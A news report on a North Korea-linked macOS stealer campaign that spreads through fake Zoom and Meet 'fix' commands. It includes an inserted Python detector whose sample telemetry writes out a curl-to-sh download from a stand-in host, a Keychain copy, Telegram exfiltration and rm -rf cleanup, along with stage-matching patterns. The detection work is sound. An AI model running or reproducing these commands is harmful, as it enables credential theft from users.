Lazarus Group Malware Targets Crypto, Business Execs via macOS



Security researchers have linked a new macOS malware campaign to the Lazarus Group, the North Korea-linked hacking operation behind some of the crypto industry's largest thefts.

Flagged on Tuesday, the new "Mach-O Man" malware kit is distributed via "ClickFix" social engineering schemes across traditional businesses and crypto companies, according to Mauro Eldritch, offensive security expert and founder of threat intelligence firm BCA Ltd.

Victims are lured into a fake Zoom or Google Meet call where they are prompted to execute commands that download the malware in the background, allowing attackers to bypass traditional controls without detection and gain access to credentials and corporate systems, the security researcher said in a Tuesday report.

Researchers said the campaign can lead to account takeovers, unauthorized infrastructure access, financial losses and the exposure of critical data, underscoring how Lazarus continues to expand its targeting beyond crypto-native companies.

The Lazarus Group is the main suspect in some of the largest-ever cryptocurrency hacks, including the $1.4 billion hack of the Bybit exchange in 2025, the industry's largest to date.

Fake Mach-O Man kit apps. Source: ANY.RUN

"Mach-O Man" kit seeks to deploy hidden stealer malware

The final stage of the campaign is a stealer designed to extract browser extension data, saved browser credentials, cookies, macOS Keychain entries and other sensitive information from infected devices.

Final staging directory for the stealer malware. Source: Any.run

After collection, the data is archived into a zip file and exfiltrated via Telegram to the attackers. Finally, the malware's self-deletion script removes the entire kit using the system's rm command, which bypasses user confirmation and permissions when removing files.
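The chain described above (a pasted lure command, Keychain and browser data collection, zip staging, Telegram exfiltration, rm-based cleanup) lends itself to stage correlation rather than single-indicator alerting. The following detector is an added example, not code from the report or from ANY.RUN; the host names, file paths, lure URL and telemetry lines are constructed, and a host is flagged only when several distinct stages co-occur, so routine zip or rm -rf usage alone does not fire.

```python
import re
from collections import defaultdict

# Constructed sample endpoint telemetry (not from the report): (host, command line or connection detail).
SAMPLE_EVENTS = [
    ("mac-01", "bash -c 'curl -fsSL http://lure.example/fix.sh | sh'"),   # pasted ClickFix "fix" command
    ("mac-01", "cp /Users/alice/Library/Keychains/login.keychain-db /tmp/.stage/"),
    ("mac-01", "zip -r /tmp/.stage/out.zip /tmp/.stage"),
    ("mac-01", "connect api.telegram.org/bot<TOKEN-PLACEHOLDER>/sendDocument"),
    ("mac-01", "rm -rf /tmp/.stage"),
    ("mac-02", "zip -r backup.zip /Users/bob/Documents"),                   # benign admin activity
    ("mac-02", "rm -rf /Users/bob/proj/node_modules"),
    ("mac-02", "curl -s https://status.example/health"),
]

# One pattern per stage of the chain the report describes: download piped into a shell,
# credential-store access, zip staging, Telegram bot API contact, forced recursive removal.
STAGE_PATTERNS = {
    "lure_exec": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    "collect":   re.compile(r"Library/(Keychains|Application Support/Google/Chrome|Cookies)"),
    "archive":   re.compile(r"\bzip\b|\bditto\b.*\s-c\b"),
    "exfil":     re.compile(r"api\.telegram\.org/bot"),
    "cleanup":   re.compile(r"\brm\s+-(rf|fr)\b"),
}

def stages_per_host(events):
    """Map each host to the set of chain stages observed in its telemetry."""
    seen = defaultdict(set)
    for host, detail in events:
        for stage, pattern in STAGE_PATTERNS.items():
            if pattern.search(detail):
                seen[host].add(stage)
    return dict(seen)

def flag_hosts(events, min_stages=3):
    """Return hosts on which at least min_stages distinct stages co-occur (sorted by name)."""
    return sorted(h for h, s in stages_per_host(events).items() if len(s) >= min_stages)

if __name__ == "__main__":
    for host, stages in stages_per_host(SAMPLE_EVENTS).items():
        print(host, sorted(stages))
    print("flagged:", flag_hosts(SAMPLE_EVENTS))
```

In production the same correlation would be keyed on a process tree or a short time window rather than on the whole host, so that unrelated activity days apart does not accumulate into a false positive.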

The novel malware kit was reconstructed by the security expert using the macOS analysis capabilities of cloud-based malware sandbox Any.run.


Earlier in April, North Korean hackers used AI-enabled social engineering schemes to steal about $100,000 worth of funds from crypto wallet Zerion, after gaining access to some team members' logged-in sessions, credentials and the company's private keys, Cointelegraph reported on April 15.
